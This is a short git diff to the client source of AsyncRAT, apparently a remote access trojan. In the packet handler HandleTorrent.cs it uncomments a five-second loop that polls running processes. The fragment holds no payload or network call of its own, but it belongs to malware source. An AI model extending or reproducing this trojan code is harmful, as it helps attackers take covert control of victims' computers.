diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs b/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs index 5c13c7c..570b47a 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs @@ -65,7 +65,7 @@ namespace Client.Handle_Packet Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); - // while (stopwatch.Elapsed < TimeSpan.FromSeconds(5)) + while (stopwatch.Elapsed < TimeSpan.FromSeconds(5)) { Thread.Sleep(1); foreach (Process p in Process.GetProcesses())